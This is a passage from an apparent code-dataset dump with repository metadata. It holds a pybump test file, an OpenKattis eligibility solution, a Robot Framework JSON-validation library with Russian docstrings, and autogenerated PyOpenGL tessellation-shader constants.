stderr=PIPE)
if completed_process_object.returncode != 0:
raise Exception(completed_process_object.stderr.decode('utf-8'))
completed_process_object = get_version("pybump/test_valid_chart.yaml")
if completed_process_object.returncode != 0:
raise Exception(completed_process_object.stderr.decode('utf-8'))
stdout = completed_process_object.stdout.decode('utf-8').strip()
if stdout != "1.0.0":
raise Exception("test_bump_major failed, return version should be 1.0.0 got " + stdout)
@staticmethod
def test_invalid_bump_major():
set_version("pybump/test_invalid_chart.yaml", "3.5.5")
completed_process_object = run(["python", "pybump/pybump.py", "bump",
"--level", "major",
"--file", "pybump/test_invalid_chart.yaml"],
stdout=PIPE,
stderr=PIPE)
if completed_process_object.returncode != 0:
pass
else:
raise Exception("test_invalid_bump_major failed, test should of fail, but passed")
if __name__ == '__main__':
unittest.main()
| 5,842 | 357 | 69 |
cd5f61d3ad1de80372cee303a7f77b5d54f1c0e1 | 380 | py | Python | Python/eligibility/eligibility.py | rvrheenen/OpenKattis | 7fd59fcb54e86cdf10f56c580c218c62e584f391 | [
"MIT"
] | 12 | 2016-10-03T20:43:43.000Z | 2021-06-12T17:18:42.000Z | Python/eligibility/eligibility.py | rvrheenen/OpenKattis | 7fd59fcb54e86cdf10f56c580c218c62e584f391 | [
"MIT"
] | null | null | null | Python/eligibility/eligibility.py | rvrheenen/OpenKattis | 7fd59fcb54e86cdf10f56c580c218c62e584f391 | [
"MIT"
] | 10 | 2017-11-14T19:56:37.000Z | 2021-02-02T07:39:57.000Z | N = input()
for i in range(int(N)):
inp = input().split()
name = inp[0]
date1 = inp[1].split("/")
date2 = inp[2].split("/")
courses = int(inp[3])
if (int(date1[0]) >= 2010 or int(date2[0]) >= 1991):
eligible = "eligible"
elif courses > 40:
eligible = "ineligible"
else:
eligible = "coach petitions"
print(name, eligible) | 27.142857 | 56 | 0.536842 | N = input()
for i in range(int(N)):
inp = input().split()
name = inp[0]
date1 = inp[1].split("/")
date2 = inp[2].split("/")
courses = int(inp[3])
if (int(date1[0]) >= 2010 or int(date2[0]) >= 1991):
eligible = "eligible"
elif courses > 40:
eligible = "ineligible"
else:
eligible = "coach petitions"
print(name, eligible) | 0 | 0 | 0 |
c65a66dd59a2fb56808acb7bfb866b36ff272d39 | 13,714 | py | Python | library/JsonValidator.py | dmizverev/robot-framework-library | 62379bc3a46ca59fd07702416c4020330dfcb7a3 | [
"Apache-2.0"
] | 28 | 2015-06-04T01:31:34.000Z | 2021-08-02T12:16:52.000Z | library/JsonValidator.py | dmizverev/robot-framework-library | 62379bc3a46ca59fd07702416c4020330dfcb7a3 | [
"Apache-2.0"
] | 4 | 2016-03-31T11:46:15.000Z | 2017-12-20T12:24:41.000Z | library/JsonValidator.py | dmizverev/robot-framework-library | 62379bc3a46ca59fd07702416c4020330dfcb7a3 | [
"Apache-2.0"
] | 21 | 2015-02-16T15:59:04.000Z | 2020-04-24T06:03:44.000Z | # -*- coding: utf-8 -*-
import json
import jsonschema
from jsonpath_rw import parse
from jsonselect import jsonselect
class JsonValidator(object):
"""
Библиотека для проверки json.
Основана на: JSONSchema, JSONPath, JSONSelect.
== Дополнительная информация ==
- [ http://json-schema.org/ | Json Schema ]
- [ http://www.jsonschema.net/ | Jsonschema generator ]
- [ http://goessner.net/articles/JsonPath/ | JSONPath by Stefan Goessner ]
- [ http://jsonpath.curiousconcept.com/ | JSONPath Tester ]
- [ http://jsonselect.org/ | JSONSelect]
- [ http://jsonselect.curiousconcept.com/ | JSONSelect Tester]
== Зависимости ==
| jsonschema | https://pypi.python.org/pypi/jsonschema |
| jsonpath-rw | https://pypi.python.org/pypi/jsonpath-rw |
| jsonselect | https://pypi.python.org/pypi/jsonselect |
== Пример использования ==
Пример json, записанного в файле json_example.json
| { "store": {
| "book": [
| { "category": "reference",
| "author": "Nigel Rees",
| "title": "Sayings of the Century",
| "price": 8.95
| },
| { "category": "fiction",
| "author": "Evelyn Waugh",
| "title": "Sword of Honour",
| "price": 12.99
| },
| { "category": "fiction",
| "author": "Herman Melville",
| "title": "Moby Dick",
| "isbn": "0-553-21311-3",
| "price": 8.99
| },
| { "category": "fiction",
| "author": "J. R. R. Tolkien",
| "title": "The Lord of the Rings",
| "isbn": "0-395-19395-8",
| "price": 22.99
| }
| ],
| "bicycle": {
| "color": "red",
| "price": 19.95
| }
| }
| }
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Check element | ${json_example}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
| | Element should exist | ${json_example} | .author:contains("Evelyn Waugh") |
"""
ROBOT_LIBRARY_SCOPE='GLOBAL'
def _validate_json(self, checked_json, schema):
"""
Проверка json по JSONSchema
"""
try:
jsonschema.validate(checked_json, schema)
except jsonschema.ValidationError , e:
raise JsonValidatorError ('Element: %s. Error: %s. '%(e.path[0], e.message))
except jsonschema.SchemaError , e:
raise JsonValidatorError ('Json-schema error:'+e.message)
def validate_jsonschema_from_file (self, json_string, path_to_schema):
"""
Проверка json по схеме, загружаемой из файла.
*Args:*\n
_json_string_ - json-строка;\n
_path_to_schema_ - путь к файлу со схемой json;
*Raises:*\n
JsonValidatorError
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Simple | Validate jsonschema from file | {"foo":bar} | ${CURDIR}${/}schema.json |
"""
schema=open(path_to_schema).read()
load_input_json=self.string_to_json (json_string)
try:
load_schema=json.loads(schema)
except ValueError, e:
raise JsonValidatorError ('Error in schema: '+e.message)
self._validate_json (load_input_json, load_schema)
def validate_jsonschema (self, json_string, input_schema):
"""
Проверка json по схеме.
*Args:*\n
_json_string_ - json-строка;\n
_input_schema_ - схема в виде строки;
*Raises:*\n
JsonValidatorError
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Simple | ${schema}= | OperatingSystem.Get File | ${CURDIR}${/}schema_valid.json |
| | Validate jsonschema | {"foo":bar} | ${schema} |
"""
load_input_json=self.string_to_json (json_string)
try:
load_schema=json.loads(input_schema)
except ValueError, e:
raise JsonValidatorError ('Error in schema: '+e.message)
self._validate_json (load_input_json, load_schema)
def string_to_json (self, source):
"""
Десериализация строки в json структуру.
*Args:*\n
_source_ - json-строка
*Return:*\n
Json структура
*Raises:*\n
JsonValidatorError
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| String to json | ${json_string}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
| | ${json}= | String to json | ${json_string} |
| | Log | ${json["store"]["book"][0]["price"]} |
=>\n
8.95
"""
try:
load_input_json=json.loads(source)
except ValueError, e:
raise JsonValidatorError("Could not parse '%s' as JSON: %s"%(source, e))
return load_input_json
def json_to_string (self, source):
"""
Cериализация json структуры в строку.
*Args:*\n
_source_ - json структура
*Return:*\n
Json строка
*Raises:*\n
JsonValidatorError
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Json to string | ${json_string}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
| | ${json}= | String to json | ${json_string} |
| | ${string}= | Json to string | ${json} |
| | ${pretty_string}= | Pretty print json | ${string} |
| | Log to console | ${pretty_string} |
"""
try:
load_input_json=json.dumps(source)
except ValueError, e:
raise JsonValidatorError("Could serialize '%s' to JSON: %s"%(source, e))
return load_input_json
def get_elements (self, json_string, expr):
"""
Возвращает список элементов из _json_string_, соответствующих [http://goessner.net/articles/JsonPath/|JSONPath] выражению.
*Args:*\n
_json_string_ - json-строка;\n
_expr_ - JSONPath выражение;
*Return:*\n
Список найденных элементов. Если элементы не найдены, то возвращается ``None``
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Get json elements | ${json_example}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
| | ${json_elements}= | Get elements | ${json_example} | $.store.book[*].author |
=>\n
| [u'Nigel Rees', u'Evelyn Waugh', u'Herman Melville', u'J. R. R. Tolkien']
"""
load_input_json=self.string_to_json (json_string)
# парсинг jsonpath
jsonpath_expr=parse(expr)
# список возвращаемых элементов
value_list=[]
for match in jsonpath_expr.find(load_input_json):
value_list.append(match.value)
if not value_list:
return None
else:
return value_list
def select_elements (self, json_string, expr):
"""
Возвращает список элементов из _json_string_, соответствующих [ http://jsonselect.org/ | JSONSelect] выражению.
*Args:*\n
_json_string_ - json-строка;\n
_expr_ - JSONSelect выражение;
*Return:*\n
Список найденных элементов. Если элементы не найдены, то ``None``
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Select json elements | ${json_example}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
| | ${json_elements}= | Select elements | ${json_example} | .author:contains("Evelyn Waugh")~.price |
=>\n
| 12.99
"""
load_input_json=self.string_to_json (json_string)
# парсинг jsonselect
jsonselect.Parser(load_input_json)
values=jsonselect.select(expr, load_input_json)
return values
def element_should_exist (self, json_string, expr):
"""
Проверка существования одного или более элементов, соответствующих [ http://jsonselect.org/ | JSONSelect] выражению.
*Args:*\n
_json_string_ - json-строка;\n
_expr_ - jsonpath выражение;\n
*Raises:*\n
JsonValidatorError
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Check element | ${json_example}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
| | Element should exist | ${json_example} | $..book[?(@.author=='Herman Melville')] |
"""
value=self.select_elements (json_string, expr)
if value is None:
raise JsonValidatorError ('Elements %s does not exist'%expr)
def element_should_not_exist (self, json_string, expr):
"""
Проверка отсутствия одного или более элементов, соответствующих [ http://jsonselect.org/ | JSONSelect] выражению.
*Args:*\n
_json_string_ - json-строка;\n
_expr_ - jsonpath выражение;\n
*Raises:*\n
JsonValidatorError
"""
value=self.select_elements (json_string, expr)
if value is not None:
raise JsonValidatorError ('Elements %s exist but should not'%expr)
def update_json(self, json_string, expr, value, index=0):
"""
Замена значения в json-строке.
*Args:*\n
_json_string_ - json-строка dict;\n
_expr_ - JSONPath выражение для определения заменяемого значения;\n
_value_ - значение, на которое будет произведена замена;\n
_index_ - устанавливает индекс для выбора элемента внутри списка совпадений, по-умолчанию равен 0;\n
*Return:*\n
Изменённый json в виде словаря.
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Update element | ${json_example}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
| | ${json_update}= | Update_json | ${json_example} | $..color | changed |
"""
load_input_json=self.string_to_json (json_string)
matches = self._json_path_search(load_input_json, expr)
datum_object = matches[int(index)]
if not isinstance(datum_object, DatumInContext):
raise JsonValidatorError("Nothing found by the given json-path")
path = datum_object.path
# Изменить справочник используя полученные данные
# Если пользователь указал на список
if isinstance(path, Index):
datum_object.context.value[datum_object.path.index] = value
# Если пользователь указал на значение (string, bool, integer or complex)
elif isinstance(path, Fields):
datum_object.context.value[datum_object.path.fields[0]] = value
return load_input_json
def pretty_print_json (self, json_string):
"""
Возврещает отформатированную json-строку _json_string_.\n
Используется метод json.dumps с настройкой _indent=2, ensure_ascii=False_.
*Args:*\n
_json_string_ - json-строка.
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Check element | ${pretty_json}= | Pretty print json | {a:1,foo:[{b:2,c:3},{d:"baz",e:4}]} |
| | Log | ${pretty_json} |
=>\n
| {
| "a": 1,
| "foo": [
| {
| "c": 3,
| "b": 2
| },
| {
| "e": 4,
| "d": "baz"
| }
| ]
| }
"""
return json.dumps(self.string_to_json(json_string), indent=2, ensure_ascii=False)
| 36.089474 | 136 | 0.526032 | # -*- coding: utf-8 -*-
import json
import jsonschema
from jsonpath_rw import parse
from jsonselect import jsonselect
class JsonValidator(object):
"""
Библиотека для проверки json.
Основана на: JSONSchema, JSONPath, JSONSelect.
== Дополнительная информация ==
- [ http://json-schema.org/ | Json Schema ]
- [ http://www.jsonschema.net/ | Jsonschema generator ]
- [ http://goessner.net/articles/JsonPath/ | JSONPath by Stefan Goessner ]
- [ http://jsonpath.curiousconcept.com/ | JSONPath Tester ]
- [ http://jsonselect.org/ | JSONSelect]
- [ http://jsonselect.curiousconcept.com/ | JSONSelect Tester]
== Зависимости ==
| jsonschema | https://pypi.python.org/pypi/jsonschema |
| jsonpath-rw | https://pypi.python.org/pypi/jsonpath-rw |
| jsonselect | https://pypi.python.org/pypi/jsonselect |
== Пример использования ==
Пример json, записанного в файле json_example.json
| { "store": {
| "book": [
| { "category": "reference",
| "author": "Nigel Rees",
| "title": "Sayings of the Century",
| "price": 8.95
| },
| { "category": "fiction",
| "author": "Evelyn Waugh",
| "title": "Sword of Honour",
| "price": 12.99
| },
| { "category": "fiction",
| "author": "Herman Melville",
| "title": "Moby Dick",
| "isbn": "0-553-21311-3",
| "price": 8.99
| },
| { "category": "fiction",
| "author": "J. R. R. Tolkien",
| "title": "The Lord of the Rings",
| "isbn": "0-395-19395-8",
| "price": 22.99
| }
| ],
| "bicycle": {
| "color": "red",
| "price": 19.95
| }
| }
| }
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Check element | ${json_example}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
| | Element should exist | ${json_example} | .author:contains("Evelyn Waugh") |
"""
ROBOT_LIBRARY_SCOPE='GLOBAL'
def _validate_json(self, checked_json, schema):
"""
Проверка json по JSONSchema
"""
try:
jsonschema.validate(checked_json, schema)
except jsonschema.ValidationError , e:
raise JsonValidatorError ('Element: %s. Error: %s. '%(e.path[0], e.message))
except jsonschema.SchemaError , e:
raise JsonValidatorError ('Json-schema error:'+e.message)
def validate_jsonschema_from_file (self, json_string, path_to_schema):
"""
Проверка json по схеме, загружаемой из файла.
*Args:*\n
_json_string_ - json-строка;\n
_path_to_schema_ - путь к файлу со схемой json;
*Raises:*\n
JsonValidatorError
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Simple | Validate jsonschema from file | {"foo":bar} | ${CURDIR}${/}schema.json |
"""
schema=open(path_to_schema).read()
load_input_json=self.string_to_json (json_string)
try:
load_schema=json.loads(schema)
except ValueError, e:
raise JsonValidatorError ('Error in schema: '+e.message)
self._validate_json (load_input_json, load_schema)
def validate_jsonschema (self, json_string, input_schema):
"""
Проверка json по схеме.
*Args:*\n
_json_string_ - json-строка;\n
_input_schema_ - схема в виде строки;
*Raises:*\n
JsonValidatorError
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Simple | ${schema}= | OperatingSystem.Get File | ${CURDIR}${/}schema_valid.json |
| | Validate jsonschema | {"foo":bar} | ${schema} |
"""
load_input_json=self.string_to_json (json_string)
try:
load_schema=json.loads(input_schema)
except ValueError, e:
raise JsonValidatorError ('Error in schema: '+e.message)
self._validate_json (load_input_json, load_schema)
def string_to_json (self, source):
"""
Десериализация строки в json структуру.
*Args:*\n
_source_ - json-строка
*Return:*\n
Json структура
*Raises:*\n
JsonValidatorError
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| String to json | ${json_string}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
| | ${json}= | String to json | ${json_string} |
| | Log | ${json["store"]["book"][0]["price"]} |
=>\n
8.95
"""
try:
load_input_json=json.loads(source)
except ValueError, e:
raise JsonValidatorError("Could not parse '%s' as JSON: %s"%(source, e))
return load_input_json
def json_to_string (self, source):
"""
Cериализация json структуры в строку.
*Args:*\n
_source_ - json структура
*Return:*\n
Json строка
*Raises:*\n
JsonValidatorError
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Json to string | ${json_string}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
| | ${json}= | String to json | ${json_string} |
| | ${string}= | Json to string | ${json} |
| | ${pretty_string}= | Pretty print json | ${string} |
| | Log to console | ${pretty_string} |
"""
try:
load_input_json=json.dumps(source)
except ValueError, e:
raise JsonValidatorError("Could serialize '%s' to JSON: %s"%(source, e))
return load_input_json
def get_elements (self, json_string, expr):
"""
Возвращает список элементов из _json_string_, соответствующих [http://goessner.net/articles/JsonPath/|JSONPath] выражению.
*Args:*\n
_json_string_ - json-строка;\n
_expr_ - JSONPath выражение;
*Return:*\n
Список найденных элементов. Если элементы не найдены, то возвращается ``None``
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Get json elements | ${json_example}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
| | ${json_elements}= | Get elements | ${json_example} | $.store.book[*].author |
=>\n
| [u'Nigel Rees', u'Evelyn Waugh', u'Herman Melville', u'J. R. R. Tolkien']
"""
load_input_json=self.string_to_json (json_string)
# парсинг jsonpath
jsonpath_expr=parse(expr)
# список возвращаемых элементов
value_list=[]
for match in jsonpath_expr.find(load_input_json):
value_list.append(match.value)
if not value_list:
return None
else:
return value_list
def select_elements (self, json_string, expr):
"""
Возвращает список элементов из _json_string_, соответствующих [ http://jsonselect.org/ | JSONSelect] выражению.
*Args:*\n
_json_string_ - json-строка;\n
_expr_ - JSONSelect выражение;
*Return:*\n
Список найденных элементов. Если элементы не найдены, то ``None``
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Select json elements | ${json_example}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
| | ${json_elements}= | Select elements | ${json_example} | .author:contains("Evelyn Waugh")~.price |
=>\n
| 12.99
"""
load_input_json=self.string_to_json (json_string)
# парсинг jsonselect
jsonselect.Parser(load_input_json)
values=jsonselect.select(expr, load_input_json)
return values
def element_should_exist (self, json_string, expr):
"""
Проверка существования одного или более элементов, соответствующих [ http://jsonselect.org/ | JSONSelect] выражению.
*Args:*\n
_json_string_ - json-строка;\n
_expr_ - jsonpath выражение;\n
*Raises:*\n
JsonValidatorError
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Check element | ${json_example}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
| | Element should exist | ${json_example} | $..book[?(@.author=='Herman Melville')] |
"""
value=self.select_elements (json_string, expr)
if value is None:
raise JsonValidatorError ('Elements %s does not exist'%expr)
def element_should_not_exist (self, json_string, expr):
"""
Проверка отсутствия одного или более элементов, соответствующих [ http://jsonselect.org/ | JSONSelect] выражению.
*Args:*\n
_json_string_ - json-строка;\n
_expr_ - jsonpath выражение;\n
*Raises:*\n
JsonValidatorError
"""
value=self.select_elements (json_string, expr)
if value is not None:
raise JsonValidatorError ('Elements %s exist but should not'%expr)
def update_json(self, json_string, expr, value, index=0):
"""
Замена значения в json-строке.
*Args:*\n
_json_string_ - json-строка dict;\n
_expr_ - JSONPath выражение для определения заменяемого значения;\n
_value_ - значение, на которое будет произведена замена;\n
_index_ - устанавливает индекс для выбора элемента внутри списка совпадений, по-умолчанию равен 0;\n
*Return:*\n
Изменённый json в виде словаря.
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Update element | ${json_example}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
| | ${json_update}= | Update_json | ${json_example} | $..color | changed |
"""
load_input_json=self.string_to_json (json_string)
matches = self._json_path_search(load_input_json, expr)
datum_object = matches[int(index)]
if not isinstance(datum_object, DatumInContext):
raise JsonValidatorError("Nothing found by the given json-path")
path = datum_object.path
# Изменить справочник используя полученные данные
# Если пользователь указал на список
if isinstance(path, Index):
datum_object.context.value[datum_object.path.index] = value
# Если пользователь указал на значение (string, bool, integer or complex)
elif isinstance(path, Fields):
datum_object.context.value[datum_object.path.fields[0]] = value
return load_input_json
def pretty_print_json (self, json_string):
"""
Возврещает отформатированную json-строку _json_string_.\n
Используется метод json.dumps с настройкой _indent=2, ensure_ascii=False_.
*Args:*\n
_json_string_ - json-строка.
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Check element | ${pretty_json}= | Pretty print json | {a:1,foo:[{b:2,c:3},{d:"baz",e:4}]} |
| | Log | ${pretty_json} |
=>\n
| {
| "a": 1,
| "foo": [
| {
| "c": 3,
| "b": 2
| },
| {
| "e": 4,
| "d": "baz"
| }
| ]
| }
"""
return json.dumps(self.string_to_json(json_string), indent=2, ensure_ascii=False)
class JsonValidatorError(Exception):
pass
| 0 | 25 | 25 |
64d838f0e8d3c1849373b5c022ce97c530fc2f78 | 3,338 | py | Python | OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/raw/GL/ARB/tessellation_shader.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | null | null | null | OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/raw/GL/ARB/tessellation_shader.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | null | null | null | OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/raw/GL/ARB/tessellation_shader.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | null | null | null | '''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GL import _types as _cs
# End users want this...
from OpenGL.raw.GL._types import *
from OpenGL.raw.GL import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GL_ARB_tessellation_shader'
GL_CCW=_C('GL_CCW',0x0901)
GL_CW=_C('GL_CW',0x0900)
GL_EQUAL=_C('GL_EQUAL',0x0202)
GL_FRACTIONAL_EVEN=_C('GL_FRACTIONAL_EVEN',0x8E7C)
GL_FRACTIONAL_ODD=_C('GL_FRACTIONAL_ODD',0x8E7B)
GL_ISOLINES=_C('GL_ISOLINES',0x8E7A)
GL_MAX_COMBINED_TESS_CONTROL_UNIFORM_COMPONENTS=_C('GL_MAX_COMBINED_TESS_CONTROL_UNIFORM_COMPONENTS',0x8E1E)
GL_MAX_COMBINED_TESS_EVALUATION_UNIFORM_COMPONENTS=_C('GL_MAX_COMBINED_TESS_EVALUATION_UNIFORM_COMPONENTS',0x8E1F)
GL_MAX_PATCH_VERTICES=_C('GL_MAX_PATCH_VERTICES',0x8E7D)
GL_MAX_TESS_CONTROL_INPUT_COMPONENTS=_C('GL_MAX_TESS_CONTROL_INPUT_COMPONENTS',0x886C)
GL_MAX_TESS_CONTROL_OUTPUT_COMPONENTS=_C('GL_MAX_TESS_CONTROL_OUTPUT_COMPONENTS',0x8E83)
GL_MAX_TESS_CONTROL_TEXTURE_IMAGE_UNITS=_C('GL_MAX_TESS_CONTROL_TEXTURE_IMAGE_UNITS',0x8E81)
GL_MAX_TESS_CONTROL_TOTAL_OUTPUT_COMPONENTS=_C('GL_MAX_TESS_CONTROL_TOTAL_OUTPUT_COMPONENTS',0x8E85)
GL_MAX_TESS_CONTROL_UNIFORM_BLOCKS=_C('GL_MAX_TESS_CONTROL_UNIFORM_BLOCKS',0x8E89)
GL_MAX_TESS_CONTROL_UNIFORM_COMPONENTS=_C('GL_MAX_TESS_CONTROL_UNIFORM_COMPONENTS',0x8E7F)
GL_MAX_TESS_EVALUATION_INPUT_COMPONENTS=_C('GL_MAX_TESS_EVALUATION_INPUT_COMPONENTS',0x886D)
GL_MAX_TESS_EVALUATION_OUTPUT_COMPONENTS=_C('GL_MAX_TESS_EVALUATION_OUTPUT_COMPONENTS',0x8E86)
GL_MAX_TESS_EVALUATION_TEXTURE_IMAGE_UNITS=_C('GL_MAX_TESS_EVALUATION_TEXTURE_IMAGE_UNITS',0x8E82)
GL_MAX_TESS_EVALUATION_UNIFORM_BLOCKS=_C('GL_MAX_TESS_EVALUATION_UNIFORM_BLOCKS',0x8E8A)
GL_MAX_TESS_EVALUATION_UNIFORM_COMPONENTS=_C('GL_MAX_TESS_EVALUATION_UNIFORM_COMPONENTS',0x8E80)
GL_MAX_TESS_GEN_LEVEL=_C('GL_MAX_TESS_GEN_LEVEL',0x8E7E)
GL_MAX_TESS_PATCH_COMPONENTS=_C('GL_MAX_TESS_PATCH_COMPONENTS',0x8E84)
GL_PATCHES=_C('GL_PATCHES',0x000E)
GL_PATCH_DEFAULT_INNER_LEVEL=_C('GL_PATCH_DEFAULT_INNER_LEVEL',0x8E73)
GL_PATCH_DEFAULT_OUTER_LEVEL=_C('GL_PATCH_DEFAULT_OUTER_LEVEL',0x8E74)
GL_PATCH_VERTICES=_C('GL_PATCH_VERTICES',0x8E72)
GL_QUADS=_C('GL_QUADS',0x0007)
GL_TESS_CONTROL_OUTPUT_VERTICES=_C('GL_TESS_CONTROL_OUTPUT_VERTICES',0x8E75)
GL_TESS_CONTROL_SHADER=_C('GL_TESS_CONTROL_SHADER',0x8E88)
GL_TESS_EVALUATION_SHADER=_C('GL_TESS_EVALUATION_SHADER',0x8E87)
GL_TESS_GEN_MODE=_C('GL_TESS_GEN_MODE',0x8E76)
GL_TESS_GEN_POINT_MODE=_C('GL_TESS_GEN_POINT_MODE',0x8E79)
GL_TESS_GEN_SPACING=_C('GL_TESS_GEN_SPACING',0x8E77)
GL_TESS_GEN_VERTEX_ORDER=_C('GL_TESS_GEN_VERTEX_ORDER',0x8E78)
GL_TRIANGLES=_C('GL_TRIANGLES',0x0004)
GL_UNIFORM_BLOCK_REFERENCED_BY_TESS_CONTROL_SHADER=_C('GL_UNIFORM_BLOCK_REFERENCED_BY_TESS_CONTROL_SHADER',0x84F0)
GL_UNIFORM_BLOCK_REFERENCED_BY_TESS_EVALUATION_SHADER=_C('GL_UNIFORM_BLOCK_REFERENCED_BY_TESS_EVALUATION_SHADER',0x84F1)
@_f
@_p.types(None,_cs.GLenum,arrays.GLfloatArray)
@_f
@_p.types(None,_cs.GLenum,_cs.GLint)
| 58.561404 | 121 | 0.864889 | '''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GL import _types as _cs
# End users want this...
from OpenGL.raw.GL._types import *
from OpenGL.raw.GL import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GL_ARB_tessellation_shader'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GL,'GL_ARB_tessellation_shader',error_checker=_errors._error_checker)
GL_CCW=_C('GL_CCW',0x0901)
GL_CW=_C('GL_CW',0x0900)
GL_EQUAL=_C('GL_EQUAL',0x0202)
GL_FRACTIONAL_EVEN=_C('GL_FRACTIONAL_EVEN',0x8E7C)
GL_FRACTIONAL_ODD=_C('GL_FRACTIONAL_ODD',0x8E7B)
GL_ISOLINES=_C('GL_ISOLINES',0x8E7A)
GL_MAX_COMBINED_TESS_CONTROL_UNIFORM_COMPONENTS=_C('GL_MAX_COMBINED_TESS_CONTROL_UNIFORM_COMPONENTS',0x8E1E)
GL_MAX_COMBINED_TESS_EVALUATION_UNIFORM_COMPONENTS=_C('GL_MAX_COMBINED_TESS_EVALUATION_UNIFORM_COMPONENTS',0x8E1F)
GL_MAX_PATCH_VERTICES=_C('GL_MAX_PATCH_VERTICES',0x8E7D)
GL_MAX_TESS_CONTROL_INPUT_COMPONENTS=_C('GL_MAX_TESS_CONTROL_INPUT_COMPONENTS',0x886C)
GL_MAX_TESS_CONTROL_OUTPUT_COMPONENTS=_C('GL_MAX_TESS_CONTROL_OUTPUT_COMPONENTS',0x8E83)
GL_MAX_TESS_CONTROL_TEXTURE_IMAGE_UNITS=_C('GL_MAX_TESS_CONTROL_TEXTURE_IMAGE_UNITS',0x8E81)
GL_MAX_TESS_CONTROL_TOTAL_OUTPUT_COMPONENTS=_C('GL_MAX_TESS_CONTROL_TOTAL_OUTPUT_COMPONENTS',0x8E85)
GL_MAX_TESS_CONTROL_UNIFORM_BLOCKS=_C('GL_MAX_TESS_CONTROL_UNIFORM_BLOCKS',0x8E89)
GL_MAX_TESS_CONTROL_UNIFORM_COMPONENTS=_C('GL_MAX_TESS_CONTROL_UNIFORM_COMPONENTS',0x8E7F)
GL_MAX_TESS_EVALUATION_INPUT_COMPONENTS=_C('GL_MAX_TESS_EVALUATION_INPUT_COMPONENTS',0x886D)
GL_MAX_TESS_EVALUATION_OUTPUT_COMPONENTS=_C('GL_MAX_TESS_EVALUATION_OUTPUT_COMPONENTS',0x8E86)
GL_MAX_TESS_EVALUATION_TEXTURE_IMAGE_UNITS=_C('GL_MAX_TESS_EVALUATION_TEXTURE_IMAGE_UNITS',0x8E82)
GL_MAX_TESS_EVALUATION_UNIFORM_BLOCKS=_C('GL_MAX_TESS_EVALUATION_UNIFORM_BLOCKS',0x8E8A)
